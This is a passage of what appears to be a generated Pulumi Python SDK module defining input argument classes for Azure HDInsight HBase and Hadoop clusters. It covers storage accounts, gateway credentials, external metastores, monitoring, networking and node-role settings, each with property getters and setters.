        pulumi.set(__self__, "aadds_resource_id", aadds_resource_id)
        pulumi.set(__self__, "domain_name", domain_name)
        pulumi.set(__self__, "domain_user_password", domain_user_password)
        pulumi.set(__self__, "domain_username", domain_username)
        pulumi.set(__self__, "ldaps_urls", ldaps_urls)
        pulumi.set(__self__, "msi_resource_id", msi_resource_id)
        if cluster_users_group_dns is not None:
            pulumi.set(__self__, "cluster_users_group_dns", cluster_users_group_dns)
    @property
    @pulumi.getter(name="aaddsResourceId")
    def aadds_resource_id(self) -> pulumi.Input[str]:
        """
        The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "aadds_resource_id")
    @aadds_resource_id.setter
    def aadds_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "aadds_resource_id", value)
    @property
    @pulumi.getter(name="domainName")
    def domain_name(self) -> pulumi.Input[str]:
        """
        The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "domain_name")
    @domain_name.setter
    def domain_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_name", value)
    @property
    @pulumi.getter(name="domainUserPassword")
    def domain_user_password(self) -> pulumi.Input[str]:
        """
        The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "domain_user_password")
    @domain_user_password.setter
    def domain_user_password(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_user_password", value)
    @property
    @pulumi.getter(name="domainUsername")
    def domain_username(self) -> pulumi.Input[str]:
        """
        The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "domain_username")
    @domain_username.setter
    def domain_username(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_username", value)
    @property
    @pulumi.getter(name="ldapsUrls")
    def ldaps_urls(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "ldaps_urls")
    @ldaps_urls.setter
    def ldaps_urls(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "ldaps_urls", value)
    @property
    @pulumi.getter(name="msiResourceId")
    def msi_resource_id(self) -> pulumi.Input[str]:
        """
        The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "msi_resource_id")
    @msi_resource_id.setter
    def msi_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "msi_resource_id", value)
    @property
    @pulumi.getter(name="clusterUsersGroupDns")
    def cluster_users_group_dns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "cluster_users_group_dns")
    @cluster_users_group_dns.setter
    def cluster_users_group_dns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "cluster_users_group_dns", value)
@pulumi.input_type
class HBaseClusterStorageAccountArgs:
    """A (blob) Storage Account attachment for a HDInsight HBase Cluster."""
    def __init__(__self__, *,
                 is_default: pulumi.Input[bool],
                 storage_account_key: pulumi.Input[str],
                 storage_container_id: pulumi.Input[str]):
        """
        :param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight HBase Cluster? Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_account_key: The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_container_id: The ID of the Storage Container. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "is_default", is_default)
        pulumi.set(__self__, "storage_account_key", storage_account_key)
        pulumi.set(__self__, "storage_container_id", storage_container_id)
    @property
    @pulumi.getter(name="isDefault")
    def is_default(self) -> pulumi.Input[bool]:
        """
        Is this the Default Storage Account for the HDInsight HBase Cluster? Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "is_default")
    @is_default.setter
    def is_default(self, value: pulumi.Input[bool]):
        pulumi.set(self, "is_default", value)
    @property
    @pulumi.getter(name="storageAccountKey")
    def storage_account_key(self) -> pulumi.Input[str]:
        """
        The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "storage_account_key")
    @storage_account_key.setter
    def storage_account_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_account_key", value)
    @property
    @pulumi.getter(name="storageContainerId")
    def storage_container_id(self) -> pulumi.Input[str]:
        """
        The ID of the Storage Container. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "storage_container_id")
    @storage_container_id.setter
    def storage_container_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_container_id", value)
@pulumi.input_type
class HBaseClusterStorageAccountGen2Args:
    """An ADLS Gen2 Storage Account attachment for a HDInsight HBase Cluster."""
    def __init__(__self__, *,
                 filesystem_id: pulumi.Input[str],
                 is_default: pulumi.Input[bool],
                 managed_identity_resource_id: pulumi.Input[str],
                 storage_resource_id: pulumi.Input[str]):
        """
        :param pulumi.Input[str] filesystem_id: The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight HBase Cluster? Changing this forces a new resource to be created.
        :param pulumi.Input[str] managed_identity_resource_id: The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_resource_id: The ID of the Storage Account. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "filesystem_id", filesystem_id)
        pulumi.set(__self__, "is_default", is_default)
        pulumi.set(__self__, "managed_identity_resource_id", managed_identity_resource_id)
        pulumi.set(__self__, "storage_resource_id", storage_resource_id)
    @property
    @pulumi.getter(name="filesystemId")
    def filesystem_id(self) -> pulumi.Input[str]:
        """
        The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "filesystem_id")
    @filesystem_id.setter
    def filesystem_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "filesystem_id", value)
    @property
    @pulumi.getter(name="isDefault")
    def is_default(self) -> pulumi.Input[bool]:
        """
        Is this the Default Storage Account for the HDInsight HBase Cluster? Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "is_default")
    @is_default.setter
    def is_default(self, value: pulumi.Input[bool]):
        pulumi.set(self, "is_default", value)
    @property
    @pulumi.getter(name="managedIdentityResourceId")
    def managed_identity_resource_id(self) -> pulumi.Input[str]:
        """
        The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "managed_identity_resource_id")
    @managed_identity_resource_id.setter
    def managed_identity_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "managed_identity_resource_id", value)
    @property
    @pulumi.getter(name="storageResourceId")
    def storage_resource_id(self) -> pulumi.Input[str]:
        """
        The ID of the Storage Account. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "storage_resource_id")
    @storage_resource_id.setter
    def storage_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_resource_id", value)
@pulumi.input_type
class HadoopClusterComponentVersionArgs:
    """Component version selection for a HDInsight Hadoop Cluster."""

    def __init__(__self__, *,
                 hadoop: pulumi.Input[str]):
        """
        :param pulumi.Input[str] hadoop: The version of Hadoop which should be used for this HDInsight Hadoop Cluster. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "hadoop", hadoop)

    @property
    @pulumi.getter
    def hadoop(self) -> pulumi.Input[str]:
        """The version of Hadoop which should be used for this HDInsight Hadoop Cluster. Changing this forces a new resource to be created."""
        return pulumi.get(self, "hadoop")

    @hadoop.setter
    def hadoop(self, value: pulumi.Input[str]):
        pulumi.set(self, "hadoop", value)
@pulumi.input_type
class HadoopClusterGatewayArgs:
    """Ambari gateway (portal) credentials for a HDInsight Hadoop Cluster."""
    def __init__(__self__, *,
                 password: pulumi.Input[str],
                 username: pulumi.Input[str],
                 enabled: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[str] password: The password used for the Ambari Portal.
        :param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
        """
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "username", username)
        # `enabled` is deprecated (the HDInsight API no longer supports
        # disabling the gateway); warn once and record it only if supplied.
        # Merged the two identical `is not None` guards into one.
        if enabled is not None:
            warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
            pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
            pulumi.set(__self__, "enabled", enabled)
    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        The password used for the Ambari Portal.
        """
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The username used for the Ambari Portal. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
        """
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class HadoopClusterMetastoresArgs:
    """External metastore configuration (Ambari, Hive, Oozie) for a HDInsight Hadoop Cluster."""
    def __init__(__self__, *,
                 ambari: Optional[pulumi.Input['HadoopClusterMetastoresAmbariArgs']] = None,
                 hive: Optional[pulumi.Input['HadoopClusterMetastoresHiveArgs']] = None,
                 oozie: Optional[pulumi.Input['HadoopClusterMetastoresOozieArgs']] = None):
        """
        :param pulumi.Input['HadoopClusterMetastoresAmbariArgs'] ambari: An `ambari` block as defined below.
        :param pulumi.Input['HadoopClusterMetastoresHiveArgs'] hive: A `hive` block as defined below.
        :param pulumi.Input['HadoopClusterMetastoresOozieArgs'] oozie: An `oozie` block as defined below.
        """
        if ambari is not None:
            pulumi.set(__self__, "ambari", ambari)
        if hive is not None:
            pulumi.set(__self__, "hive", hive)
        if oozie is not None:
            pulumi.set(__self__, "oozie", oozie)
    @property
    @pulumi.getter
    def ambari(self) -> Optional[pulumi.Input['HadoopClusterMetastoresAmbariArgs']]:
        """
        An `ambari` block as defined below.
        """
        return pulumi.get(self, "ambari")
    @ambari.setter
    def ambari(self, value: Optional[pulumi.Input['HadoopClusterMetastoresAmbariArgs']]):
        pulumi.set(self, "ambari", value)
    @property
    @pulumi.getter
    def hive(self) -> Optional[pulumi.Input['HadoopClusterMetastoresHiveArgs']]:
        """
        A `hive` block as defined below.
        """
        return pulumi.get(self, "hive")
    @hive.setter
    def hive(self, value: Optional[pulumi.Input['HadoopClusterMetastoresHiveArgs']]):
        pulumi.set(self, "hive", value)
    @property
    @pulumi.getter
    def oozie(self) -> Optional[pulumi.Input['HadoopClusterMetastoresOozieArgs']]:
        """
        An `oozie` block as defined below.
        """
        return pulumi.get(self, "oozie")
    @oozie.setter
    def oozie(self, value: Optional[pulumi.Input['HadoopClusterMetastoresOozieArgs']]):
        pulumi.set(self, "oozie", value)
@pulumi.input_type
class HadoopClusterMetastoresAmbariArgs:
    """External Ambari metastore (SQL database) settings for a HDInsight Hadoop Cluster."""
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        :param pulumi.Input[str] database_name: The external Ambari metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "database_name", database_name)
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "server", server)
        pulumi.set(__self__, "username", username)
    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL database. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "database_name")
    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)
    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """
        The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "server")
    @server.setter
    def server(self, value: pulumi.Input[str]):
        pulumi.set(self, "server", value)
    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class HadoopClusterMetastoresHiveArgs:
    """External Hive metastore (SQL database) settings for a HDInsight Hadoop Cluster."""
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        :param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "database_name", database_name)
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "server", server)
        pulumi.set(__self__, "username", username)
    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """
        The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "database_name")
    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)
    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """
        The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "server")
    @server.setter
    def server(self, value: pulumi.Input[str]):
        pulumi.set(self, "server", value)
    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class HadoopClusterMetastoresOozieArgs:
    """External Oozie metastore (SQL database) settings for a HDInsight Hadoop Cluster."""
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        :param pulumi.Input[str] database_name: The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "database_name", database_name)
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "server", server)
        pulumi.set(__self__, "username", username)
    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """
        The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "database_name")
    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)
    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """
        The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "server")
    @server.setter
    def server(self, value: pulumi.Input[str]):
        pulumi.set(self, "server", value)
    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class HadoopClusterMonitorArgs:
    """Operations Management Suite (OMS) monitoring settings for a HDInsight Hadoop Cluster."""

    def __init__(__self__, *,
                 log_analytics_workspace_id: pulumi.Input[str],
                 primary_key: pulumi.Input[str]):
        """
        :param pulumi.Input[str] log_analytics_workspace_id: The Operations Management Suite (OMS) workspace ID.
        :param pulumi.Input[str] primary_key: The Operations Management Suite (OMS) workspace key.
        """
        # Both fields are required; record them in one pass.
        for attr, val in (("log_analytics_workspace_id", log_analytics_workspace_id),
                          ("primary_key", primary_key)):
            pulumi.set(__self__, attr, val)

    @property
    @pulumi.getter(name="logAnalyticsWorkspaceId")
    def log_analytics_workspace_id(self) -> pulumi.Input[str]:
        """The Operations Management Suite (OMS) workspace ID."""
        return pulumi.get(self, "log_analytics_workspace_id")

    @log_analytics_workspace_id.setter
    def log_analytics_workspace_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "log_analytics_workspace_id", value)

    @property
    @pulumi.getter(name="primaryKey")
    def primary_key(self) -> pulumi.Input[str]:
        """The Operations Management Suite (OMS) workspace key."""
        return pulumi.get(self, "primary_key")

    @primary_key.setter
    def primary_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "primary_key", value)
@pulumi.input_type
class HadoopClusterNetworkArgs:
    def __init__(__self__, *,
                 connection_direction: Optional[pulumi.Input[str]] = None,
                 private_link_enabled: Optional[pulumi.Input[bool]] = None):
        """
        Network settings for an HDInsight Hadoop cluster.

        :param pulumi.Input[str] connection_direction: The direction of the resource provider connection. Possible values include `Inbound` or `Outbound`. Defaults to `Inbound`. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] private_link_enabled: Is the private link enabled? Possible values include `True` or `False`. Defaults to `False`. Changing this forces a new resource to be created.
        """
        # Only persist values the caller actually supplied.
        for prop_name, prop_value in (
                ("connection_direction", connection_direction),
                ("private_link_enabled", private_link_enabled)):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="connectionDirection")
    def connection_direction(self) -> Optional[pulumi.Input[str]]:
        """The direction of the resource provider connection. Possible values include `Inbound` or `Outbound`. Defaults to `Inbound`. Changing this forces a new resource to be created."""
        return pulumi.get(self, "connection_direction")

    @connection_direction.setter
    def connection_direction(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "connection_direction", value)

    @property
    @pulumi.getter(name="privateLinkEnabled")
    def private_link_enabled(self) -> Optional[pulumi.Input[bool]]:
        """Is the private link enabled? Possible values include `True` or `False`. Defaults to `False`. Changing this forces a new resource to be created."""
        return pulumi.get(self, "private_link_enabled")

    @private_link_enabled.setter
    def private_link_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "private_link_enabled", value)
@pulumi.input_type
class HadoopClusterRolesArgs:
    def __init__(__self__, *,
                 head_node: pulumi.Input['HadoopClusterRolesHeadNodeArgs'],
                 worker_node: pulumi.Input['HadoopClusterRolesWorkerNodeArgs'],
                 zookeeper_node: pulumi.Input['HadoopClusterRolesZookeeperNodeArgs'],
                 edge_node: Optional[pulumi.Input['HadoopClusterRolesEdgeNodeArgs']] = None):
        """
        Role (node group) configuration for an HDInsight Hadoop cluster.

        :param pulumi.Input['HadoopClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
        :param pulumi.Input['HadoopClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
        :param pulumi.Input['HadoopClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
        :param pulumi.Input['HadoopClusterRolesEdgeNodeArgs'] edge_node: A `edge_node` block as defined below.
        """
        # The three mandatory node roles are always stored.
        for prop_name, prop_value in (("head_node", head_node),
                                      ("worker_node", worker_node),
                                      ("zookeeper_node", zookeeper_node)):
            pulumi.set(__self__, prop_name, prop_value)
        # Edge nodes are optional and only stored when configured.
        if edge_node is not None:
            pulumi.set(__self__, "edge_node", edge_node)

    @property
    @pulumi.getter(name="headNode")
    def head_node(self) -> pulumi.Input['HadoopClusterRolesHeadNodeArgs']:
        """A `head_node` block as defined above."""
        return pulumi.get(self, "head_node")

    @head_node.setter
    def head_node(self, value: pulumi.Input['HadoopClusterRolesHeadNodeArgs']):
        pulumi.set(self, "head_node", value)

    @property
    @pulumi.getter(name="workerNode")
    def worker_node(self) -> pulumi.Input['HadoopClusterRolesWorkerNodeArgs']:
        """A `worker_node` block as defined below."""
        return pulumi.get(self, "worker_node")

    @worker_node.setter
    def worker_node(self, value: pulumi.Input['HadoopClusterRolesWorkerNodeArgs']):
        pulumi.set(self, "worker_node", value)

    @property
    @pulumi.getter(name="zookeeperNode")
    def zookeeper_node(self) -> pulumi.Input['HadoopClusterRolesZookeeperNodeArgs']:
        """A `zookeeper_node` block as defined below."""
        return pulumi.get(self, "zookeeper_node")

    @zookeeper_node.setter
    def zookeeper_node(self, value: pulumi.Input['HadoopClusterRolesZookeeperNodeArgs']):
        pulumi.set(self, "zookeeper_node", value)

    @property
    @pulumi.getter(name="edgeNode")
    def edge_node(self) -> Optional[pulumi.Input['HadoopClusterRolesEdgeNodeArgs']]:
        """A `edge_node` block as defined below."""
        return pulumi.get(self, "edge_node")

    @edge_node.setter
    def edge_node(self, value: Optional[pulumi.Input['HadoopClusterRolesEdgeNodeArgs']]):
        pulumi.set(self, "edge_node", value)
@pulumi.input_type
class HadoopClusterRolesEdgeNodeArgs:
    def __init__(__self__, *,
                 install_script_actions: pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesEdgeNodeInstallScriptActionArgs']]],
                 target_instance_count: pulumi.Input[int],
                 vm_size: pulumi.Input[str]):
        """
        Edge-node role configuration for an HDInsight Hadoop cluster.

        :param pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesEdgeNodeInstallScriptActionArgs']]] install_script_actions: A `install_script_action` block as defined below.
        :param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Edge Nodes. Changing this forces a new resource to be created.
        """
        # All three fields are required, so they are stored unconditionally.
        for prop_name, prop_value in (
                ("install_script_actions", install_script_actions),
                ("target_instance_count", target_instance_count),
                ("vm_size", vm_size)):
            pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="installScriptActions")
    def install_script_actions(self) -> pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesEdgeNodeInstallScriptActionArgs']]]:
        """A `install_script_action` block as defined below."""
        return pulumi.get(self, "install_script_actions")

    @install_script_actions.setter
    def install_script_actions(self, value: pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesEdgeNodeInstallScriptActionArgs']]]):
        pulumi.set(self, "install_script_actions", value)

    @property
    @pulumi.getter(name="targetInstanceCount")
    def target_instance_count(self) -> pulumi.Input[int]:
        """The number of instances which should be run for the Worker Nodes."""
        return pulumi.get(self, "target_instance_count")

    @target_instance_count.setter
    def target_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "target_instance_count", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """The Size of the Virtual Machine which should be used as the Edge Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)
@pulumi.input_type
class HadoopClusterRolesEdgeNodeInstallScriptActionArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 uri: pulumi.Input[str]):
        """
        An install-script action executed while provisioning an edge node.

        :param pulumi.Input[str] name: The name of the install script action. Changing this forces a new resource to be created.
        :param pulumi.Input[str] uri: The URI pointing to the script to run during the installation of the edge node. Changing this forces a new resource to be created.
        """
        # Both fields are required, so they are stored unconditionally.
        for prop_name, prop_value in (("name", name), ("uri", uri)):
            pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """The name of the install script action. Changing this forces a new resource to be created."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def uri(self) -> pulumi.Input[str]:
        """The URI pointing to the script to run during the installation of the edge node. Changing this forces a new resource to be created."""
        return pulumi.get(self, "uri")

    @uri.setter
    def uri(self, value: pulumi.Input[str]):
        pulumi.set(self, "uri", value)
@pulumi.input_type
class HadoopClusterRolesHeadNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Head-node role configuration for an HDInsight Hadoop cluster.

        :param pulumi.Input[str] username: The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional settings are stored only when explicitly supplied.
        for prop_name, prop_value in (
                ("password", password),
                ("ssh_keys", ssh_keys),
                ("subnet_id", subnet_id),
                ("virtual_network_id", virtual_network_id)):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class HadoopClusterRolesWorkerNodeArgs:
    def __init__(__self__, *,
                 target_instance_count: pulumi.Input[int],
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 autoscale: Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleArgs']] = None,
                 min_instance_count: Optional[pulumi.Input[int]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
